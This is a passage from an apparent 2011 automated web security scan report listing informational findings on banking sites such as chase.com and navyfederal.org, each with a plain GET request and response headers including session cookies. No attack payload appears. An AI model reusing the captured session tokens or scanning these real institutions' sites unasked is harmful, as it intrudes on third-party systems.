Set-Cookie: DCTMSESSION=ShdXNJXDQb0ZFHj1qGKczSFvgTsznLZk7Y4h2czW2Hy7tvLD7KtZ!1262409899; path=/
Connection: close

<html LANG="EN" >
<head>
<META NAME="robots" CONTENT="index,follow"/>
<title >Chase</title>
</head>
<body><script language="JavaScript">
var s_pageName="Homeownership Center - Obama March 4th - chase
...[SNIP]...

23.23. https://www.chase.com/cm/chf/miscellaneous/page/hmda.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.chase.com
Path:   /cm/chf/miscellaneous/page/hmda.html

Request

GET /cm/chf/miscellaneous/page/hmda.html HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:16:35 GMT
Content-length: 9457
Content-type: text/html
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Last-modified: Sat, 12 Jun 2010 03:46:32 GMT
Etag: "24f1-4c130318"
Accept-ranges: bytes
Connection: close

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Chase</title>
...[SNIP]...

23.24. https://www.chase.com/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.chase.com
Path:   /index.jsp

Request

GET /index.jsp?pg_name=ccpmapp/privacy_security/fraud/page/report_fraud HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:16:34 GMT
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Set-Cookie: DCTMSESSION=ZdKgNJXC95pk6d7psPy260n66QTy1jdTGryGY6GQGDG5Qv2n2vlQ!1262409899; path=/
Connection: close


<html LANG="EN" >


<head>


<link rel='stylesheet' type='text/css' href='/ccpmweb/shared/document/content.css'/>
<script language='Javas
...[SNIP]...

23.25. https://www.chase.com/online/Checking/chase-checking-account.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.chase.com
Path:   /online/Checking/chase-checking-account.htm

Request

GET /online/Checking/chase-checking-account.htm HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:16:32 GMT
Content-type: text/html
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:xalan="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.org/xslt/java" LANG="EN"><head>
...[SNIP]...

23.26. https://www.chase.com/online/Home-Lending/mortgages.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.chase.com
Path:   /online/Home-Lending/mortgages.htm

Request

GET /online/Home-Lending/mortgages.htm HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:16:32 GMT
Content-type: text/html
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:xalan="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.org/xslt/java" LANG="EN"><head>
...[SNIP]...

23.27. https://www.chase.com/online/Home-Refinance/mortgage-refinancing.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.chase.com
Path:   /online/Home-Refinance/mortgage-refinancing.htm

Request

GET /online/Home-Refinance/mortgage-refinancing.htm HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:16:32 GMT
Content-type: text/html
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:xalan="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.org/xslt/java" LANG="EN"><head>
...[SNIP]...

23.28. https://www.chase.com/online/auto-loan/car-loan.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.chase.com
Path:   /online/auto-loan/car-loan.htm

Request

GET /online/auto-loan/car-loan.htm HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:16:33 GMT
Content-type: text/html
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:xalan="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.org/xslt/java" LANG="EN"><head>
...[SNIP]...

23.29. https://www.chase.com/online/investments/annuities.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.chase.com
Path:   /online/investments/annuities.htm

Request

GET /online/investments/annuities.htm HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:16:32 GMT
Content-type: text/html
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:xalan="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.org/xslt/java" LANG="EN"><head>
...[SNIP]...

23.30. https://www.chase.com/online/investments/financial-services.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.chase.com
Path:   /online/investments/financial-services.htm

Request

GET /online/investments/financial-services.htm HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:16:32 GMT
Content-type: text/html
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:xalan="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.org/xslt/java" LANG="EN"><head>
...[SNIP]...

23.31. https://www.chase.com/online/services/branch-message.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.chase.com
Path:   /online/services/branch-message.htm

Request

GET /online/services/branch-message.htm HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:16:33 GMT
Content-type: text/html
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:xalan="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.org/xslt/java" LANG="EN"><head>
...[SNIP]...

23.32. https://www.chase.com/wamuwelcome3/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.chase.com
Path:   /wamuwelcome3/

Request

GET /wamuwelcome3/ HTTP/1.1
Host: www.chase.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:00:50 GMT
Content-length: 14892
Content-type: text/html
Set-Cookie: v1st=60B8BEB245ABF79; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Last-modified: Thu, 06 Jan 2011 22:25:12 GMT
Etag: "3a2c-4d264148"
Accept-ranges: bytes

<html LANG="EN" >

<head>
<link rel='stylesheet' type='text/css' href='/ccpmweb/shared/document/ChaseGlobal.css'/>
<script language="Javascript1.2" type="text/javascript">
<!--
...[SNIP]...

23.33. https://www.citicapitaladvisors.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.citicapitaladvisors.com
Path:   /

Request

GET / HTTP/1.1
Host: www.citicapitaladvisors.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:16:55 GMT
Content-length: 872
Content-type: text/html
Last-modified: Wed, 11 Aug 2010 19:03:53 GMT
Etag: "368-4c62f419"
Accept-ranges: bytes
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Citi Alternative Investments</title>
</head>

<script ty
...[SNIP]...

23.34. https://www.ibsnetaccess.com/spotlight/ibsspotlight.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ibsnetaccess.com
Path:   /spotlight/ibsspotlight.html

Request

GET /spotlight/ibsspotlight.html HTTP/1.1
Host: www.ibsnetaccess.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000UNiRaq4SV-vGMcUowkf6zr5:15bs25f24; origin=https://www.ibsnetaccess.com/NASApp/NetAccess/LoginDisplay; TLTUID=C697A0BA2F17102F003A8D446414B7D1; URLNamespace=ibsnetaccess; TLTSID=C697A0BA2F17102F003A8D446414B7D1;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:27 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 30 Mar 2010 00:12:23 GMT
ETag: "7bd801-2b4f-7bd707c0"
Accept-Ranges: bytes
Content-Length: 11087
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...

23.35. https://www.merrilledge.com/m/pages/home.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/home.aspx

Request

GET /m/pages/home.aspx HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=+3nYGeeE+NPdhSQG3vh+HTqhnIVv2HDbcYHGjp54fTB2eN8gWiB5w9oZxieXINxyqp5JOkWFYpxYSlEUp+s/Q7dr/qI2dW4+Ugpj9Ak4HneKuqAmlrb9+b1lkfb5z1x01mFDUVUSIPYlzqUceh73FNi2dPFIGUKgIrS5YIX0VBG3Kvli+WXEUzA7MvB4u5+Py7hXzFl2ORnsgVAu/Q1zWhLJKMtsBGrF/kIITSL0QaUJLsFt1mJRkosThEinabeRLDNi7M3YfO8wlKzm7S/B4D7p2u5Ayo2RQLBc18md65QkSsQY684a0I+0n4l2tFejlKie8oTEEzEd1h4/38tbkAQPmqC7kZDPfpNiMp3x7g7+sQ9iY5IsI0nIEkrpqitpkAvfVRHp/q7rPO7Eb1rSSTXtThYXqMEQsxKQIVS0AC82nDR2hbKY7xCDjqXsAEHo8nuo3VN2ebUSNpzuny4qEnUzC7b+k3WQKNy5wsp07CNxBAJQojRx5NQNw1xQyJfaQ6R8CsLqvuK9to/Ypp9xRkRlF27tPV9g2nrXGMcvOFz5HQIJqD5zfSuYF1SPhTc5tj8W5U6dRGuwHkHGPzos1a1H98yr4g+RpcHn8DNPXR1oSvecaDlW11MMEwLXbB4Q; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=6e232d9b30534bdfa9d614bf9ec5848f; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 105239


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...

23.36. https://www.myschedule.navyfederal.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.myschedule.navyfederal.org
Path:   /

Request

GET / HTTP/1.1
Host: www.myschedule.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 15100
Content-Type: text/html
Content-Location: http://www.myschedule.navyfederal.org/Default.htm
Last-Modified: Wed, 07 Nov 2001 15:10:00 GMT
Accept-Ranges: bytes
ETag: "014cf449e67c11:5e8"
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:19:30 GMT
Connection: close
Set-Cookie: TS26bd7b=a65ecccc74731a368fe90c1afa57c1bee8233e9e4dea5aa14d49d874; Path=/

<HTML>
<HEAD><meta scheme='a1afcc517bec909bf5c3fddea7c83c3d' name='TS26bd7b' content='fcdfb7ae7487b17f' /><!--9cc5da25f89a21d1fbb5ffa18da0bb73--><script type="text/javascript">if(window.addEventListe
...[SNIP]...

23.37. https://www.mystreetscape.com/my/charteroneinvest  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mystreetscape.com
Path:   /my/charteroneinvest

Request

GET /my/charteroneinvest HTTP/1.1
Host: www.mystreetscape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: FWS/7.0
Date: Wed, 02 Feb 2011 22:19:32 GMT
P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi"
Set-cookie: MC=ICnV^lPuGcmwLOC9l5HCSfEXjIkSAk1J2HQKA0w6IAAOywABqjMGBAAAAQAGBU1J2HQAP03; path=/; domain=.mystreetscape.com; expires=Thu, 02-Feb-2012 22:19:32 GMT
Set-cookie: spc=311; path=/
Cache-control: public
Set-cookie: HttpOnly
Set-cookie: JSESSIONID=48E9C3976D90BB921D5C93D8E938BE52; path=/; secure
Content-length: 264
Content-type: text/html
Fsreqid: REQ4d49d8740a034c3a20000ecb0000aa33
Fscalleeid: ibweb311
Fselapsedtime: 9719
Connection: close


<html>

<head>


<title>
Charter One Investments
</title>

</head>

<FRAMESET ROWS="100%, *" frameborder=no border=0>
<FRAME NAME="mainframe" onload='javascript:' SRC="/my/charteroneinvest/jsp/
...[SNIP]...

23.38. https://www.mystreetscape.com/my/citizensinvest  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mystreetscape.com
Path:   /my/citizensinvest

Request

GET /my/citizensinvest HTTP/1.1
Host: www.mystreetscape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: FWS/7.0
Date: Wed, 02 Feb 2011 22:19:32 GMT
P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi"
Set-cookie: MC=^dlv6nLB_DEtlMTGowZrrNRWb_gSAk1J2HQKA0w6IAAO3QABqjMGBAAAAQAGBU1J2HQAP03; path=/; domain=.mystreetscape.com; expires=Thu, 02-Feb-2012 22:19:32 GMT
Set-cookie: spc=321; path=/
Cache-control: public
Set-cookie: HttpOnly
Set-cookie: JSESSIONID=7117D3482F67F60B23716F580E8C6714; path=/; secure
Content-length: 259
Content-type: text/html
Fsreqid: REQ4d49d8740a034c3a20000edd0000aa33
Fscalleeid: ibweb321
Fselapsedtime: 9769
Connection: close


<html>

<head>


<title>
Citizens Investments
</title>

</head>

<FRAMESET ROWS="100%, *" frameborder=no border=0>
<FRAME NAME="mainframe" onload='javascript:' SRC="/my/citizensinvest/jsp/login
...[SNIP]...

23.39. https://www.navyfederal.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /

Request

GET / HTTP/1.1
Host: www.navyfederal.org
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:40 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:00:40 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 37359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-
...[SNIP]...

23.40. https://www.navyfederal.org/about/about.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /about/about.php

Request

GET /about/about.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:37 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:37 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.41. https://www.navyfederal.org/about/eligibility-checklist.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /about/eligibility-checklist.php

Request

GET /about/eligibility-checklist.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:37 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:37 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 29424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.42. https://www.navyfederal.org/about/presidents-message.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /about/presidents-message.php

Request

GET /about/presidents-message.php HTTP/1.1
Host: www.navyfederal.org
Connection: keep-alive
Referer: https://www.navyfederal.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:42 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:00:42 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 2774

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<title>Navy Federal: Presidents Message</title>
<meta http-equiv="Content-Type"
...[SNIP]...

23.43. https://www.navyfederal.org/account-management/how-do-i.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /account-management/how-do-i.php

Request

GET /account-management/how-do-i.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:53 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:53 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 54928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.44. https://www.navyfederal.org/account-management/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /account-management/index.php

Request

GET /account-management/index.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:52 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:52 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30171

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.45. https://www.navyfederal.org/assets/rates/discl.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /assets/rates/discl.html

Request

GET /assets/rates/discl.html HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:00 GMT
Server: Apache
Last-Modified: Mon, 27 Sep 2010 14:50:14 GMT
ETag: "333-d88d9580"
Accept-Ranges: bytes
Content-Length: 819
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.46. https://www.navyfederal.org/branches-atms/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /branches-atms/index.php

Request

GET /branches-atms/index.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:39 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:39 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 37607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.47. https://www.navyfederal.org/browser-requirements.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /browser-requirements.html

Request

GET /browser-requirements.html HTTP/1.1
Host: www.navyfederal.org
Connection: keep-alive
Referer: https://www.navyfederal.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:43 GMT
Server: Apache
Last-Modified: Fri, 29 Oct 2010 21:01:31 GMT
ETag: "137c-c349a0c0"
Accept-Ranges: bytes
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:00:43 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 4988

<style type="text/css">
body {
   font: normal 12px arial;
   color: #464646;
}
h1 {
   font-size: 26px;
   margin: 3px 0 5px 0;
   color: #9b4013;
   font-family: Arial, sans-serif;
}
h2 {
   font-size
...[SNIP]...

23.48. https://www.navyfederal.org/contact-us.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /contact-us.php

Request

GET /contact-us.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:38 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:38 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 32208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

23.49. https://www.navyfederal.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.navyfederal.org
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:50 GMT
Server: Apache
